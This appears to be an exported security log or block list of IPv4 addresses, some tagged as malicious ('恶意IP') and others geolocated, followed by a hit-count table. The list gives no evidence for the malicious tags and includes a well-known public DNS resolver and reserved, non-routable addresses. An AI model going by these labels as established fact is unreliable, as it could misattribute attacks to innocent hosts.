223.15.54.102 恶意IP
180.97.189.156 恶意IP
222.141.113.126 恶意IP
14.18.105.198 恶意IP
113.74.128.95 恶意IP
122.230.40.5 恶意IP
223.16.215.117 恶意IP
42.240.129.52 恶意IP
222.137.112.11 恶意IP
42.225.48.25 恶意IP
125.41.208.109 恶意IP
211.101.236.135 恶意IP
219.156.153.239 恶意IP
18.162.213.61 恶意IP
220.192.145.31 恶意IP
42.3.201.202 恶意IP
42.176.169.245 恶意IP
106.110.134.126 恶意IP
52.5.118.182 弗吉尼亚
185.254.37.216 -
183.136.225.31 浙江省
39.144.228.147 -
223.104.90.135 广西
117.61.1.151 四川省
122.13.77.124 广东省
119.4.175.235 四川省
223.104.241.10 云南省
111.196.58.238 北京
39.144.230.203 -
120.216.234.69 河南省
47.98.172.144 浙江省
47.110.180.32 浙江省
47.110.180.33 浙江省
47.110.180.34 浙江省
47.110.180.35 浙江省
124.77.171.243 上海
124.220.162.36 北京
42.84.161.64 辽宁省
113.160.72.162 河内
192.241.222.93 加利福尼亚
192.241.219.50 加利福尼亚
142.93.54.161 纽约
45.155.91.247 -
205.210.31.37 安大略
89.248.165.56 北荷兰
121.254.147.246 首尔
112.66.243.132 海南省
45.137.116.63 -
23.89.5.60 加利福尼亚
104.131.128.14 加利福尼亚
198.199.104.48 加利福尼亚
103.224.212.221 加利福尼亚
104.236.128.30 加利福尼亚
103.224.212.220 加利福尼亚
253.157.14.165 -
45.55.35.54 纽约
49.2.123.56 新南威尔士
138.68.133.118 伦敦
154.58.31.66 -
199.254.199.244 华盛顿
189.129.149.114 Mexico
118.89.58.55 广东省
192.241.197.11 加利福尼亚
190.211.252.50 Ticino
4.2.2.2 -
212.192.202.119 Rostovskaya
192.241.196.108 加利福尼亚
45.128.232.62 -
83.35.39.231 Cantabria
185.200.118.79 伦敦
103.137.63.117 -
202.103.251.246 广西
146.19.191.108 -
143.110.192.203 明尼苏达
190.210.152.148 -
77.4.7.92 Bayern
146.148.34.125 艾奥瓦
5.133.168.15 -
111.192.102.213 北京
198.199.107.20 加利福尼亚
196.10.89.62 -
197.4.4.12 -
162.243.136.62 加利福尼亚
105.112.249.195 -
185.200.118.67 伦敦
192.241.232.36 加利福尼亚
112.248.62.247 山东省
161.97.89.210 科罗拉多
54.76.135.1 Dublin
165.22.68.119 法兰克福
183.136.225.31 浙江省
87.236.176.180 -
107.148.149.146 加利福尼亚
192.241.208.62 加利福尼亚
178.128.227.204 安大略
89.165.3.27 -
185.200.116.72 -
192.241.204.26 加利福尼亚
49.93.164.238 江苏省
198.199.108.20 加利福尼亚
249.129.46.48 -
107.170.237.74 加利福尼亚
107.170.237.73 加利福尼亚
189.163.17.5 Mexico
185.85.188.62 Bursa
192.155.88.231 新泽西
189.146.237.73 Mexico
88.204.179.118 -
199.254.199.225 华盛顿
138.68.208.29 加利福尼亚
190.12.59.131 -
198.98.183.144 弗吉尼亚
87.236.176.151 -
118.5.49.6 广岛县
198.199.105.69 加利福尼亚
68.183.13.61 阿姆斯特丹
89.248.163.209 北荷兰
47.92.5.158 河北省
37.139.129.26 马里兰
103.78.150.209 哈里亚纳
188.5.4.96 -
82.200.154.210 -
162.243.136.42 加利福尼亚
165.232.73.237 宾夕法尼亚
189.163.152.29 Mexico
192.241.197.21 加利福尼亚
120.78.171.32 广东省
2.57.149.93 加利福尼亚
162.243.134.28 加利福尼亚
详情 计数
199.254.199.225 8
101.43.131.124 6
111.30.232.239 6
115.171.206.56 6
119.45.116.236 6
119.91.30.216 6
14.18.105.198 6
146.19.191.108 6
162.14.108.149 6
175.27.157.249 6
203.56.198.50 6
211.101.236.135 6
219.155.86.248 6
219.156.153.239 6
36.139.90.88 6
36.139.93.155 6
42.192.83.35 6
45.128.232.62 6
49.232.193.91 6
61.52.1.187 6
61.52.4.110 6
8.130.114.73 6
82.156.151.104 6
95.214.53.99 6
101.133.224.19 5
101.133.226.32 5
183.136.225.31 5
185.200.118.67 5
185.200.118.79 5
198.235.24.201 5
199.254.199.244 5
37.139.129.26 5
47.100.68.69 5
47.101.149.21 5
47.101.154.149 5
47.92.199.215 5
47.94.151.38 5
89.248.165.124 5
94.102.61.42 5
1.13.9.165 4
101.132.223.4 4
101.200.121.243 4
101.200.125.235 4
101.200.127.65 4
101.200.82.132 4
101.201.80.58 4
103.225.84.43 4
103.252.118.75 4
106.110.134.126 4
106.55.107.106 4
106.57.165.109 4
106.58.246.138 4
111.170.75.196 4
111.179.76.4 4
111.201.175.156 4
111.67.58.35 4
111.7.96.149 4
112.126.83.111 4
112.248.113.169 4
112.248.244.57 4
112.47.34.246 4
113.24.224.236 4
113.24.224.31 4
113.246.224.193 4
113.252.145.146 4
113.74.128.95 4
114.103.73.104 4
114.132.55.109 4
114.216.49.150 4
114.226.24.123 4
114.239.72.233 4
114.253.103.147 4
114.97.38.134 4
115.159.112.166 4
115.227.53.220 4
115.55.5.252 4
115.57.30.175 4
115.60.49.192 4
116.235.244.97 4
116.246.9.2 4
116.62.48.36 4
117.176.227.58 4
117.71.53.55 4
118.178.233.247 4
118.195.135.88 4
118.195.151.253 4
118.195.163.139 4
118.195.241.144 4
118.195.252.229 4
118.81.85.187 4
119.139.137.132 4
119.162.122.131 4
119.45.197.199 4
120.78.151.80 4
120.78.154.245 4
121.227.252.156 4
121.230.92.38 4
121.239.19.217 4
121.40.172.29 4